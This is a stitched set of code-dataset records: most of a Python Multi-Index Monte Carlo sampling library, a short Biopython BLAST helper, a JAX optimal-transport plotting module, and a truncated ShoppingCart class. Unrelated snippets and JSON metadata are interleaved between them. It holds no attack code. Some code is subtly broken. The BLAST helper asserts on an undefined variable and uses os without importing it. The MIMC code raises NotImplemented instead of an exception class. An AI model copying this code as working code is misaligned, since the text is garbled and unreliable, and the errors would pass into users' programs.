Data levels, moment estimators, sample sizes etc. 
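# Hedged sketch of the per-level estimators MIMCData above maintains:
# psums stores running sums of powers of the samples, M the per-level
# sample counts, and calcEl divides the two while leaving unsampled
# levels at zero. Data is hypothetical.
import numpy as np

psums = np.array([[10.0, 30.0], [2.0, 1.0], [0.0, 0.0]])  # sums of Y, Y**2
M = np.array([5, 4, 0])
El = np.zeros_like(M, dtype=float)
idx = M != 0
El[idx] = psums[idx, 0] / M[idx]
print(El)   # [2.  0.5 0. ]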
are\n stored in the *.data attribute that is of the MIMCData type\n\n \"\"\"\n\n def __init__(self, old_data=None, **kwargs):\n self.params = MyDefaultDict(**kwargs)\n self.fnHierarchy = None\n self.fnWorkModel = None\n self.fnSampleLvl = None\n self.fnSampleQoI = None\n self.fnItrDone = None\n self.fnExtendLvls = None\n self.Vl_estimate = None\n self.Wl_estimate = None\n self.bias = np.inf # Approximation of the discretization error\n self.stat_error = np.inf # Sampling error (based on M)\n if old_data is not None:\n assert(old_data.dim == self.params.dim)\n self.all_data = self.data = old_data\n else:\n self.all_data = self.data = MIMCData(dim=self.params.dim, moments=self.params.moments)\n if not self.params.reuse_samples:\n self.all_data = MIMCData(dim=self.params.dim, moments=self.params.moments)\n\n if (hasattr(self.params, \"w\") and len(self.params.w) != self.data.dim) or \\\n (hasattr(self.params, \"s\") and len(self.params.s) != self.data.dim) or \\\n (hasattr(self.params, \"gamma\") and len(self.params.gamma) != self.data.dim) or \\\n (hasattr(self.params, \"beta\") and len(self.params.beta) != self.data.dim):\n raise ValueError(\"Size of beta, w, s and gamma must be of size dim\")\n\n if self.params.bayesian and self.data.dim > 1:\n raise NotImplementedError(\"Bayesian parameter fitting is only \\\nsupported in one dimensional problem\")\n\n if self.params.bayesian:\n self.Q = MyDefaultDict(S=np.inf, W=np.inf,\n w=self.params.w, s=self.params.s,\n theta=np.nan)\n else:\n self.Q = MyDefaultDict(theta=np.nan)\n\n def _checkFunctions(self):\n # If self.params.reuse_samples is True then\n # all_data will always equal data\n if self.fnWorkModel is None and hasattr(self.params, \"gamma\"):\n self.fnWorkModel = lambda lvls: work_estimate(lvls,\n np.log(self.params.beta) *\n np.array(self.params.gamma))\n\n if self.fnHierarchy is None:\n self.fnHierarchy = lambda lvls: get_geometric_hl(lvls,\n self.params.h0inv,\n np.array(self.params.beta))\n\n if self.params.bayesian and self.fnWorkModel is None:\n raise NotImplementedError(\"Bayesian parameter fitting is only \\\nsupported with a given work model\")\n\n if self.fnWorkModel is None:\n # ADDING WORK MODEL B\n warnings.warn(\"fnWorkModel is not provided, using run-time estimates.\")\n raise NotImplemented(\"Need to check that the lvls \\\nare the same as the argument ones\")\n self.fnWorkModel = lambda lvls: self.Tl()\n # self.fnExtendLvls = self.fnExtendLvls or \\\n # (lambda: extend_lvls_tensor(self.data.dim,\n # self.data.lvls,\n # self.params.M0,\n # self.params.min_lvls/self.params.dim))\n if self.fnExtendLvls is None:\n weights = np.array(self.params.beta) * (np.array(self.params.w) +\n (np.array(self.params.s) -\n np.array(self.params.gamma))/2.)\n weights /= np.sum(weights)\n if len(weights) == 1:\n weights = weights[0]*np.ones(self.params.dim)\n\n self.fnExtendLvls = lambda w=weights: extend_lvls_td(w,\n self.data.lvls,\n self.params.M0,\n self.params.min_lvls/self.params.dim)\n if self.fnSampleQoI is not None:\n if self.fnSampleLvl is not None:\n raise ValueError(\"Cannot set both fnSampleLvl and fnSampleQoI\")\n self.fnSampleLvl = lambda *a: GenericSampleLvl(self.fnSampleQoI, *a)\n\n if self.fnSampleLvl is None:\n raise ValueError(\"Must set the sampling functions fnSampleLvl or fnSampleQoI\")\n\n def setFunctions(self, **kwargs):\n # fnExtendLvls(): Returns new lvls and number of samples on each.\n # called only once if the Bayesian method is used\n # fnSampleLvl(moments, mods, inds, M):\n # Returns M, array: M sums of 
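# Hedged sketch of the geometric work model _checkFunctions above wires
# in: work_estimate(lvls, log(beta) * gamma) evaluates to
#   W_l = prod_i beta_i ** (gamma_i * l_i),
# i.e. the cost grows by a factor beta**gamma per level.
import numpy as np

beta, gamma = np.array([2.0]), np.array([3.0])
lvls = np.arange(4).reshape(-1, 1)
W = np.prod(np.exp(lvls * (np.log(beta) * gamma)), axis=1)
print(W)   # [  1.   8.  64. 512.]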
mods*inds, and total\n # (linear) time it took to compute them\n # fnItrDone(i, TOLs, totalTime): Called at the end of iteration\n # i out of TOLs\n # fnWorkModel(lvls): Returns work estimate of lvls\n # fnHierarchy(lvls): Returns associated hierarchy of lvls\n for k in kwargs.keys():\n if k not in [\"fnExtendLvls\", \"fnSampleLvl\",\n \"fnItrDone\", \"fnWorkModel\",\n \"fnHierarchy\", \"fnSampleQoI\"]:\n raise KeyError(\"Invalid function name\")\n setattr(self, k, kwargs[k])\n\n @staticmethod\n def addOptionsToParser(parser, pre='-mimc_', additional=True, default_bayes=True):\n def str2bool(v):\n # susendberg's function\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n mimcgrp = parser.add_argument_group('MIMC', 'Arguments to control MIMC logic')\n mimcgrp.register('type', 'bool', str2bool)\n\n def add_store(name, **kwargs):\n if \"default\" in kwargs and \"help\" in kwargs:\n kwargs[\"help\"] += \" (default: {})\".format(kwargs[\"default\"])\n mimcgrp.add_argument(pre + name, dest=name,\n action=\"store\",\n **kwargs)\n\n add_store('verbose', type='bool', default=False,\n help=\"Verbose output\")\n add_store('bayesian', type='bool', default=False,\n help=\"Use Bayesian fitting to estimate bias, variance and optimize number \\\nof levels in every iteration. This is based on CMLMC.\")\n add_store('dim', type=int, help=\"Number of dimensions used in MIMC\")\n add_store('moments', type=int, default=2, help=\"Number of moments to compute\")\n add_store('reuse_samples', type='bool', default=True,\n help=\"Reuse samples between iterations\")\n add_store('abs_bnd', type='bool', default=False,\n help=\"Take absolute value of deltas when \\\nestimating bias (sometimes that's too conservative).\")\n add_store('const_theta', type='bool', default=False,\n help=\"Use the same theta for all iterations\")\n add_store('Ca', type=float, default=3,\n help=\"Parameter to control confidence level\")\n add_store('theta', type=float, default=0.5,\n help=\"Minimum theta or error splitting parameter.\")\n add_store('incL', type=int, default=2,\n help=\"Maximum increment of number of levels \\\nbetween iterations\")\n add_store('w', nargs='+', type=float,\n help=\"Weak convergence rates. Must be scalar or of size -dim. \\\nNot needed if fnExtendLvls is specified and -bayesian is False.\")\n add_store('s', nargs='+', type=float,\n help=\"Strong convergence rates. Must be a scalar or of size -dim. \\\nNot needed if fnExtendLvls is specified and -bayesian is False.\")\n add_store('TOL', type=float,\n help=\"The required tolerance for the MIMC run\")\n add_store('beta', type=float, nargs='+',\n help=\"Level separation parameter. to be used \\\nwith get_geometric_hl. Not needed if fnHierarchy is provided.\")\n add_store('gamma', type=float, nargs='+',\n help=\"Work exponent to be used with work_estimate.\\\nNot needed if fnWorkModel and fnExtendLvls are provided.\")\n\n # The following arguments are not needed if bayes is False\n if default_bayes:\n add_store('bayes_k0', type=float, default=0.1,\n help=\"Variance in prior of the constant \\\nin the weak convergence model. Not needed if -bayesian is False.\")\n add_store('bayes_k1', type=float, default=0.1,\n help=\"Variance in prior of the constant \\\nin the strong convergence model. Not needed if -bayesian is False.\")\n add_store('bayes_w_sig', type=float, default=-1,\n help=\"Variance in prior of the power \\\nin the weak convergence model, negative values lead to disabling the fitting. 
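# Hedged sketch of the argparse pattern addOptionsToParser above uses:
# options share a '-mimc_' prefix and a 'bool' type is registered so
# "yes"/"true"/"t"/"1" parse to True. Only the 'verbose' flag is
# reproduced here.
import argparse

parser = argparse.ArgumentParser()
grp = parser.add_argument_group('MIMC')
grp.register('type', 'bool', lambda v: v.lower() in ('yes', 'true', 't', '1'))
grp.add_argument('-mimc_verbose', dest='verbose', action='store',
                 type='bool', default=False)
print(parser.parse_args(['-mimc_verbose', 'yes']).verbose)   # True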
\\\nNot needed if -bayesian is False.\")\n add_store('bayes_s_sig', type=float, default=-1,\n help=\"Variance in prior of the power \\\nin the weak convergence model, negative values lead to disabling the fitting. \\\nNot needed if -bayesian is False.\")\n add_store('bayes_fit_lvls', type=float, default=1000,\n help=\"Maximum number of levels used to fit data. \\\nNot needed if -bayesian is False.\")\n\n # The following arguments are not always needed, and they have\n # a default value\n if additional:\n add_store('max_TOL', type=float, default=0.1,\n help=\"The (approximate) tolerance for \\\nthe first iteration. Not needed if TOLs is provided to doRun.\")\n add_store('M0', type=int, default=10, help=\"The initial number of samples \\\nused to estimate the sample variance when not using the Bayesian estimators. \\\nNot needed if fnExtendLvls is provided.\")\n add_store('min_lvls', type=int, default=2,\n help=\"The initial number of levels to run \\\nthe first iteration. Not needed if fnExtendLvls is provided.\")\n add_store('max_add_itr', type=int, default=2,\n help=\"Maximum number of additonal iterations\\\nto run when the MIMC is expected to but is not converging.\\\nNot needed if TOLs is provided to doRun.\")\n add_store('r1', type=float, default=2,\n help=\"A parameters to control to tolerance sequence \\\nfor tolerance larger than TOL. Not needed if TOLs is provided to doRun.\")\n add_store('r2', type=float, default=1.1,\n help=\"A parameters to control to tolerance sequence \\\nfor tolerance smaller than TOL. Not needed if TOLs is provided to doRun.\")\n add_store('h0inv', type=float, nargs='+', default=2,\n help=\"Minimum element size get_geometric_hl. \\\nNot needed if fnHierarchy is provided.\")\n return mimcgrp\n\n def calcTotalWork(self):\n return np.sum(self.Wl_estimate * self.data.M)\n\n def totalErrorEst(self):\n return self.bias + self.stat_error\n\n def __str__(self):\n output = \"Time={:.12e}\\nEg={:.12e}\\n\\\nBias={:.12e}\\nStatErr={:.12e}\\\n\\nTotalErrEst={:.12e}\\n\".format(self.data.calcTotalTime(),\n self.data.calcEg(),\n self.bias,\n self.stat_error,\n self.totalErrorEst())\n V = self.Vl_estimate\n E = self.data.calcEl()\n T = self.data.calcTl()\n\n output += (\"{:<8}{:^20}{:^20}{:>8}{:>15}\\n\".format(\n \"Level\", \"E\", \"V\", \"M\", \"Time\"))\n for i in range(0, len(self.data.lvls)):\n assert(V[i]>=0)\n #,100 * np.sqrt(V[i]) / np.abs(E[i])\n output += (\"{:<8}{:>+20.12e}{:>20.12e}{:>8}{:>15.6e}\\n\".format(\n str(self.data.lvls[i]), E[i], V[i], self.data.M[i], T[i]))\n return output\n\n ################## Bayesian specific functions\n def _estimateBias(self):\n if not self.params.bayesian:\n bnd = is_boundary(self.data.dim, self.data.lvls)\n if np.sum(bnd) == len(self.data.lvls):\n return np.inf\n bnd_val = self.data[bnd].calcEl()\n if self.params.abs_bnd:\n return np.abs(np.sum(np.abs(bnd_val)))\n return np.abs(np.sum(bnd_val))\n return self._estimateBayesianBias()\n\n def _estimateBayesianBias(self, L=None):\n L = L or len(self.all_data.lvls)-1\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n return self.Q.W * hl[-1]**self.Q.w[0]\n\n def _estimateBayesianVl(self, L=None):\n if np.sum(self.all_data.M) == 0:\n return self.all_data.calcVl()\n oL = len(self.all_data.lvls)-1\n L = L or oL\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n M = 
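# Hedged sketch of the weak-rate bias model behind _estimateBayesianBias
# above: with the geometric hierarchy h_l = beta**(-l) / h0inv (see
# get_geometric_hl later in this record), the bias at the finest level L
# is modeled as Q.W * h_L**Q.w, shrinking like beta**(-w*L).
import numpy as np

h0inv, beta, W, w = 2.0, 2.0, 1.5, 2.0   # hypothetical fitted constants
L = 5
hl = beta**(-np.arange(L + 1, dtype=float)) / h0inv
print(W * hl[-1]**w)   # modeled bias at level L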
np.concatenate((self.all_data[1:].M, np.zeros(L-oL)))\n s1 = np.concatenate((self.all_data.psums[1:, 0], np.zeros(L-oL)))\n m1 = np.concatenate((self.all_data[1:].calcEl(), np.zeros(L-oL)))\n s2 = np.concatenate((self.all_data.psums[1:, 1],\n np.zeros(L-oL)))\n mu = self.Q.W*(hl[:-1]**self.Q.w[0] - hl[1:]**self.Q.w[0])\n Lambda = 1./(self.Q.S*(hl[:-1]**(self.Q.s[0]/2.) - hl[1:]**(self.Q.s[0]/2.))**2)\n G_3 = self.params.bayes_k1 * Lambda + M/2.0\n # G_4 = self.params.bayes_k1 + \\\n # 0.5*M*(s2 + self.params.bayes_k0 * (m1 - mu)**2 /\n # (self.params.bayes_k0 + M)) - 0.5*m1**2\n G_4 = self.params.bayes_k1 + \\\n 0.5*(s2 -2*s1*m1 + s1*m1 +\n M*self.params.bayes_k0*(m1-mu)**2 / (self.params.bayes_k0+M) )\n return np.concatenate((self.all_data[0].calcVl(), G_4 / G_3))\n\n def _estimateQParams(self):\n if not self.params.bayesian:\n return\n if np.sum(self.all_data.M) == 0:\n return # Cannot really estimate anything without at least some samples\n L = len(self.all_data.lvls)-1\n if L <= 1:\n raise Exception(\"Must have at least 2 levels\")\n hl = self.fnHierarchy(np.arange(0, L+1).reshape((-1, 1))).reshape(1, -1)[0]\n begin = np.maximum(1, L-self.params.bayes_fit_lvls)\n M = self.all_data[begin:].M\n # m1 = self.all_data[begin:].calcEl()\n # m2 = self.all_data[begin:].calcEl(moment=2)\n # wl = hl[begin:]**self.Q.w[0] - hl[(begin-1):-1]**self.Q.w[0]\n # sl = (hl[begin:]**(self.Q.s[0]/2.) - hl[(begin-1):-1]**(self.Q.s[0]/2.))**-2\n # self.Q.W = np.abs(np.sum(wl * sl * M * m1) / np.sum(M * wl**2 * sl))\n # self.Q.S = np.sum(sl * (m2 - 2*m1*self.Q.W*wl + self.Q.W**2*wl**2)) / np.sum(M)\n s1 = self.all_data.psums[begin:, 0]\n s2 = self.all_data.psums[begin:, 1]\n t1 = hl[(begin-1):-1]**self.Q.w[0] - hl[begin:]**self.Q.w[0]\n t2 = (hl[(begin-1):-1]**(self.Q.s[0]/2.) 
- hl[begin:]**(self.Q.s[0]/2.))**-2\n self.Q.W = np.abs(np.sum(s1 * t1 * t2) / np.sum(M * t1**2 * t2))\n self.Q.S = np.sum(t2*(s2 - 2*s1*t1*self.Q.W + M*self.Q.W**2*t1**2)) / np.sum(M)\n if self.params.bayes_w_sig > 0 or self.params.bayes_s_sig > 0:\n # TODO: Estimate w=q_1, s=q_2\n raise NotImplemented(\"TODO, estimate w and s\")\n\n def _estimateOptimalL(self, TOL):\n assert self.params.bayesian, \"MIMC should be Bayesian to \\\nestimate optimal number of levels\"\n minL = len(self.data)\n minWork = np.inf\n LsRange = range(len(self.data.lvls), len(self.data.lvls)+1+self.params.incL)\n for L in LsRange:\n bias_est = self._estimateBayesianBias(L)\n if bias_est >= TOL and L < LsRange[-1]:\n continue\n Wl = self.fnWorkModel(np.arange(0, L+1).reshape((-1, 1)))\n M = self._calcTheoryM(TOL,\n theta=self._calcTheta(TOL, bias_est),\n Vl=self._estimateBayesianVl(L), Wl=Wl)\n totalWork = np.sum(Wl*M)\n if totalWork < minWork:\n minL = L\n minWork = totalWork\n return minL\n\n ################## END: Bayesian specific function\n def _estimateAll(self):\n self._estimateQParams()\n self.Vl_estimate = self.all_data.calcVl() if not self.params.bayesian \\\n else self._estimateBayesianVl()\n self.Wl_estimate = self.fnWorkModel(self.data.lvls)\n self.bias = self._estimateBias()\n self.stat_error = np.inf if np.any(self.data.M == 0) \\\n else self.params.Ca * \\\n np.sqrt(np.sum(self.Vl_estimate / self.data.M))\n\n def _addLevels(self, lvls):\n self.data.addLevels(lvls)\n if self.all_data != self.data:\n self.all_data.addLevels(lvls)\n\n def _genSamples(self, totalM, verbose):\n lvls = self.data.lvls\n s = len(lvls)\n M = np.zeros(s, dtype=np.int)\n psums = np.zeros_like(self.data.psums)\n p = np.arange(1, psums.shape[1]+1)\n t = np.zeros(s)\n for i in range(0, s):\n if totalM[i] <= self.data.M[i]:\n continue\n if verbose:\n print(\"# Doing\", totalM[i]-self.data.M[i], \"of level\", lvls[i])\n mods, inds = lvl_to_inds_general(lvls[i])\n M[i], psums[i, :], t[i] = self.fnSampleLvl(p, mods, inds,\n totalM[i] -\n self.data.M[i])\n self.data.addSamples(psums, M, t)\n if self.all_data != self.data:\n self.all_data.addSamples(psums, M, t)\n self._estimateAll()\n\n def _calcTheta(self, TOL, bias_est):\n if not self.params.const_theta:\n return 1 - bias_est/TOL\n return self.params.theta\n\n def _calcTheoryM(self, TOL, theta, Vl, Wl, ceil=True, minM=1):\n M = (theta * TOL / self.params.Ca)**-2 *\\\n np.sum(np.sqrt(Wl * Vl)) * np.sqrt(Vl / Wl)\n M = np.maximum(M, minM)\n if ceil:\n M = np.ceil(M).astype(np.int)\n return M\n\n def doRun(self, finalTOL=None, TOLs=None, verbose=None):\n self._checkFunctions()\n finalTOL = finalTOL or self.params.TOL\n TOLs = TOLs or get_tol_sequence(finalTOL, self.params.max_TOL,\n max_additional_itr=self.params.max_add_itr,\n r1=self.params.r1,\n r2=self.params.r2)\n if verbose is None:\n verbose = self.params.verbose\n if len(self.data.lvls) != 0:\n warnings.warn(\"Running the same object twice, resetting\")\n self.data = MIMCData(self.data.dim)\n if not all(x >= y for x, y in zip(TOLs, TOLs[1:])):\n raise Exception(\"Tolerances must be decreasing\")\n\n import time\n tic = time.time()\n self.Q.theta = self.params.theta\n self.bias = np.inf\n self.stat_error = np.inf\n import gc\n def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n for itrIndex, TOL in enumerate(TOLs):\n if verbose:\n print(\"# TOL\", TOL)\n while True:\n gc.collect()\n if self.params.bayesian and len(self.data.lvls) > 0:\n L = 
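# Hedged sketch of the allocation _calcTheoryM above computes,
#   M_l = (theta*TOL/Ca)**-2 * sum_k sqrt(W_k*V_k) * sqrt(V_l/W_l),
# the classic MLMC sample-size formula for a statistical error budget
# of theta*TOL at confidence parameter Ca. Inputs are hypothetical.
import numpy as np

TOL, Ca, theta = 0.01, 3.0, 0.5
Vl = np.array([1.0, 0.25, 0.0625])   # per-level variances
Wl = np.array([1.0, 8.0, 64.0])      # per-level costs
M = (theta * TOL / Ca)**-2 * np.sum(np.sqrt(Wl * Vl)) * np.sqrt(Vl / Wl)
print(np.ceil(np.maximum(M, 1)).astype(int))   # most samples on cheap levels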
self._estimateOptimalL(TOL)\n if L > len(self.data.lvls):\n self._addLevels(np.arange(len(self.data.lvls),\n L+1).reshape((-1, 1)))\n self._estimateAll()\n\n self.Q.theta = np.maximum(self._calcTheta(TOL, self.bias),\n self.params.theta)\n if len(self.data.lvls) == 0 or \\\n (not self.params.bayesian and self.bias > (1 - self.Q.theta) * TOL):\n # Bias is not satisfied (or this is the first iteration)\n # Add more levels\n newlvls, newTodoM = self.fnExtendLvls()\n prev = len(self.data.lvls)\n self._addLevels(newlvls)\n self._genSamples(np.concatenate((self.data.M[:prev],\n newTodoM)), verbose)\n self._estimateAll()\n self.Q.theta = np.maximum(self._calcTheta(TOL, self.bias),\n self.params.theta)\n\n todoM = self._calcTheoryM(TOL, self.Q.theta,\n self.Vl_estimate,\n self.Wl_estimate)\n if verbose:\n print(\"# theta\", self.Q.theta)\n print(\"# New M: \", todoM)\n if not self.params.reuse_samples:\n self.data.zero_samples()\n self._genSamples(todoM, verbose)\n if verbose:\n print(self, end=\"\")\n print(\"------------------------------------------------\")\n if self.params.bayesian or self.totalErrorEst() < TOL:\n break\n\n totalTime = time.time() - tic\n tic = time.time()\n if verbose:\n print(\"{} took {}\".format(TOL, totalTime))\n print(\"################################################\")\n if self.fnItrDone:\n self.fnItrDone(itrIndex, TOL, totalTime)\n if isclose(TOL, finalTOL) and self.totalErrorEst() < finalTOL:\n break\n\n\n@public\ndef GenericSampleLvl(fnSampleQoI, moments, mods, inds, M):\n import time\n timeStart = time.time()\n psums = np.zeros(len(moments))\n for m in range(0, M):\n solves = fnSampleQoI(inds)\n psums += np.sum(mods*solves)**moments\n return M, psums, time.time() - timeStart\n\n\n@public\ndef extend_lvls_tensor(dim, lvls, M0, min_deg=1):\n if len(lvls) <= 0:\n out_lvls = [[0] * dim]\n seeds = lvls = out_lvls\n deg = 0\n else:\n out_lvls = list()\n deg = np.max([np.max(ll) for ll in lvls])\n seeds = [ll for ll in lvls if np.max(ll) == deg]\n\n additions = [f for f in itertools.product([0, 1], repeat=dim) if max(f) > 0]\n while True:\n newlvls = list()\n for l in seeds:\n newlvls.extend([(np.array(l) + a).tolist() for a in\n additions if (np.array(l) + a).tolist()\n not in newlvls])\n out_lvls.extend(newlvls)\n deg += 1\n if deg >= min_deg:\n break\n seeds = newlvls\n return out_lvls, M0*np.ones(len(out_lvls), dtype=np.int)\n\n\n@public\ndef extend_lvls_td(w, lvls, M0, min_deg=2):\n # w specifies the dimension\n prev_deg = np.max(np.sum(np.array(\n [w*np.array(l) for l in lvls]), axis=1)) if lvls else 0\n max_deg = prev_deg\n while True:\n max_deg += np.min(w)\n max_deg = np.maximum(max_deg, min_deg)\n C, _ = setutil.AnisoProfCalculator(w*0, w).GetIndexSet(max_deg)\n all_lvls = C.to_dense_matrix() - 1\n newlvls = [lvl.tolist() for lvl in all_lvls if lvl.tolist()\n not in lvls]\n if len(newlvls) > 0:\n return newlvls, M0*np.ones(len(newlvls), dtype=np.int)\n\n\n@public\ndef work_estimate(lvls, gamma):\n return np.prod(np.exp(np.array(lvls)*gamma), axis=1)\n\n\ndef is_boundary(d, lvls):\n if len(lvls) == 1:\n return [True] # Special case for zero element\n bnd = np.zeros(len(lvls), dtype=int)\n for i in range(0, d):\n x = np.zeros(d)\n x[i] = 1\n bnd += np.array([1 if l[i] == 0 or (np.array(l)+x).tolist() in lvls else 0 for l in lvls])\n return bnd < d\n\n\ndef lvl_to_inds_general(lvl):\n\n \"\"\"\n This routine takes a multi-index level and produces\n a list of levels and weights that are needed to evaluate\n the multi-dimensional difference estimator.\n\n For 
example, in the MLMC setting the function\n x,y = lvl_to_inds_general([N])\n\n sets y to an array of [N] and [N-1]\n and x to an array of 1 and -1.\n\n \"\"\"\n\n lvl = np.array(lvl, dtype=np.int)\n seeds = list()\n for i in range(0, lvl.shape[0]):\n if lvl[i] == 0:\n seeds.append([0])\n else:\n seeds.append([0, 1])\n inds = np.array(list(itertools.product(*seeds)), dtype=np.int)\n mods = (2 * np.sum(lvl) % 2 - 1) * (2 * (np.sum(inds, axis=1) % 2) - 1)\n return mods, np.tile(lvl, (inds.shape[0], 1)) - inds\n\n\n@public\ndef get_geometric_hl(lvls, h0inv, beta):\n return beta**(-np.array(lvls, dtype=np.float))/h0inv\n\n\n@public\ndef get_tol_sequence(TOL, maxTOL, max_additional_itr=1, r1=2, r2=1.1):\n # number of iterations until TOL\n eni = int(-(np.log(TOL)-np.log(maxTOL))/np.log(r1))\n return np.concatenate((TOL*r1**np.arange(eni, -1, -1),\n TOL*r2**-np.arange(1, max_additional_itr+1)))\n\n@public\ndef get_optimal_hl(mimc):\n if mimc.data.dim != 1:\n raise NotImplemented(\"Optimized hierarchies are only supported\\\n for one-dimensional problems\")\n\n # TODO: Get formula from HajiAli 2015, Optimizing MLMC hierarchies\n raise NotImplemented(\"TODO: get_optimal_hl\")\n\n\n@public\ndef calcMIMCRate(w, s, gamma):\n d = len(w)\n if len(s) != d or len(gamma) != d:\n raise ValueError(\"w,s and gamma must have the same size\")\n delta = (gamma-s)/(2*w)\n zeta = np.max(delta)\n xi = np.min((2.*w - s) / gamma)\n d2 = np.sum(delta == 0)\n dz = np.sum(delta == zeta)\n rate = -2.*(1. + np.maximum(0, zeta))\n log_rate = np.nan\n if (zeta <= 0 and zeta < xi) or (zeta == xi and zeta == 0 and d <= 2):\n log_rate = 2*d2\n elif zeta > 0 and xi > 0:\n log_rate = 2*(dz-1)*(zeta+1)\n elif zeta == 0 and xi == 0 and d > 2:\n log_rate = 2*d2 + d - 3\n elif zeta > 0 and xi == 0:\n log_rate = d-1 + 2*(dz-1)*(1+zeta)\n return rate, log_rate\n","sub_path":"mimclib/mimc.py","file_name":"mimc.py","file_ext":"py","file_size_in_byte":31722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"229709535","text":"from Bio.Blast import NCBIWWW\nfrom Bio import SeqIO \n#pre condition- check if file is there and is in fasta format-- check file format\n#dont need an assertion here for pre condit because the first line in the code below already checks for that\ndef sequence_blaster(fasta_path, results_path):\n record = SeqIO.read(fasta_path, format=\"fasta\")\n result_handle = NCBIWWW.qblast(\"blastn\", \"nt\", record.format(\"fasta\"))\n \n save_file = open(results_path, 'w')\n save_file.write(result_handle.read())\n save_file.close()\n assert os.stat(results_file).st_size != 0 \n #post condition- check results file is not size zero\n ","sub_path":"nave-powerspythonpackage/sequence_blaster.py","file_name":"sequence_blaster.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"463086475","text":"# coding=utf-8\n# Copyright 2021 Google LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
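# Hedged sketch of the telescoping expansion lvl_to_inds_general above
# produces: a one-dimensional level [N] becomes the levels [N] and
# [N-1] with weights +1 and -1, the usual MLMC difference estimator.
import itertools
import numpy as np

lvl = np.array([3])
seeds = [[0] if l == 0 else [0, 1] for l in lvl]
inds = np.array(list(itertools.product(*seeds)))
mods = (2 * np.sum(lvl) % 2 - 1) * (2 * (np.sum(inds, axis=1) % 2) - 1)
print(mods)                                      # [ 1 -1]
print(np.tile(lvl, (inds.shape[0], 1)) - inds)   # [[3] [2]]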
License.\n\n\"\"\"Plotting utils.\"\"\"\n\nfrom typing import Union\n\nimport jax.numpy as jnp\nimport matplotlib.pyplot as plt\nfrom ott.tools import transport\nimport scipy\n\n\ndef bidimensional(x: jnp.ndarray, y: jnp.ndarray):\n \"\"\"Applies PCA to reduce to bimensional data.\"\"\"\n if x.shape[1] < 3:\n return x, y\n\n u, s, _ = scipy.sparse.linalg.svds(jnp.concatenate([x, y], axis=0), k=2)\n proj = u * s\n k = x.shape[0]\n return proj[:k], proj[k:]\n\n\ndef _couplings(ax,\n x: jnp.ndarray,\n y: jnp.ndarray,\n a: jnp.ndarray,\n b: jnp.ndarray,\n matrix: jnp.ndarray,\n threshold: float = 0.0,\n scale: int = 200,\n cmap: str = 'Purples'):\n \"\"\"Plots 2-D couplings. Projects via PCA if data is higher dimensional.\"\"\"\n x, y = bidimensional(x, y)\n\n sa, sb = jnp.min(a) / scale, jnp.min(b) / scale\n ax.scatter(*x.T, s=a / sa, edgecolors='k', marker='o', label='x')\n ax.scatter(*y.T, s=b / sb, edgecolors='k', marker='X', label='y')\n\n cmap = plt.get_cmap(cmap)\n u, v = jnp.where(matrix > threshold)\n c = matrix[jnp.where(matrix > threshold)]\n xy = jnp.concatenate([x[u], y[v]], axis=-1)\n for i in range(xy.shape[0]):\n strength = jnp.max(jnp.array(matrix.shape)) * c[i]\n ax.plot(xy[i, [0, 2]], xy[i, [1, 3]],\n linewidth=0.5 + 4 * strength,\n color=cmap(strength),\n zorder=0, alpha=0.7)\n ax.legend(fontsize=15)\n\n\ndef couplings(arg: Union[transport.Transport, jnp.ndarray],\n y: jnp.ndarray = None,\n a: jnp.ndarray = None,\n b: jnp.ndarray = None,\n matrix: jnp.ndarray = None,\n ax=None,\n **kwargs):\n \"\"\"Plots 2D points and the couplings between them.\"\"\"\n if ax is None:\n _, ax = plt.subplots(1, 1, figsize=(8, 5))\n\n if isinstance(arg, transport.Transport):\n ot = arg\n return _couplings(ax, ot.geom.x, ot.geom.y, ot.a, ot.b, ot.matrix, **kwargs)\n\n return _couplings(ax, arg, y, a, b, matrix, **kwargs)\n\n\ndef _barycenters(ax,\n y: jnp.ndarray,\n a: jnp.ndarray,\n b: jnp.ndarray,\n matrix: jnp.ndarray,\n scale: int = 200):\n \"\"\"Plots 2-D sinkhorn barycenters.\"\"\"\n sa, sb = jnp.min(a) / scale, jnp.min(b) / scale\n ax.scatter(*y.T, s=b / sb, edgecolors='k', marker='X', label='y')\n tx = 1 / a[:, None] * jnp.matmul(matrix, y)\n ax.scatter(*tx.T, s=a / sa, edgecolors='k', marker='X', label='T(x)')\n ax.legend(fontsize=15)\n\n\ndef barycenters(arg: Union[transport.Transport, jnp.ndarray],\n a: jnp.ndarray = None,\n b: jnp.ndarray = None,\n matrix: jnp.ndarray = None,\n ax=None,\n **kwargs):\n \"\"\"Plots the barycenters, from the Transport object or from arguments.\"\"\"\n if ax is None:\n _, ax = plt.subplots(1, 1, figsize=(8, 5))\n\n if isinstance(arg, transport.Transport):\n ot = arg\n return _barycenters(ax, ot.geom.y, ot.a, ot.b, ot.matrix, **kwargs)\n\n return _barycenters(ax, arg, a, b, matrix, **kwargs)\n","sub_path":"ott/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"477141381","text":"class ShoppingCart():\n \n def __init__(self):\n self.total = 0\n self.items = dict()\n \n def add_item(self,item_name,quantity,price):\n \"\"\"This method should adds the cost of the added items to the current value of total , and \n also adds an entry to the items dict such that the key is the item_name and the value is the quantity of the item \"\"\"\n self.total = self.total + (price*quantity)\n self.items[item_name] = quantity\n \n def remove_item(self,item_name,quantity,price):\n if item_name in self.items:\n if quantity < 
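# Hedged sketch of the 2-D projection bidimensional() above applies
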